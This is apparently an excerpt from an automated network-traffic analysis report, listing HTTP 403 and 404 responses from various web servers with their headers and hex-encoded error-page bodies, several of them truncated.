                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:53:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:41 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:53:41 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: uQYp2jzZ/I1jJQisRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F3LP%2BD8QrrtErJolNpBNdudo%2FkIjNf58qZmetPSpbssy4Kd5hCPiKhXm5GiCFGoOpNd%2BQESfRN1e4bEaoR%2FxtrXuBVY7lfUni8cZu9WlHE0XHGrIcrlHhzfnSSqCny%2Fd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e1be87a5c6e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PXz24DEE2G7p9zAYjaFmx6XuwEmemr1md9254EG8HBTpMum0iqCkLRILhgm%2ByEpwj4o7nJ6371KSG1eMRhmjtXqZ2fNh9%2FPkm%2F0z6eKAhwe8fNSjK6WHZWz0i5wQ1wkh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e1c28bf5c6e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:44 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:44 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 27 Jul 2023 19:53:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 27 Jul 2023 19:53:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 7X-Kong-Proxy-Latency: 1Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:53:45 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:47 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 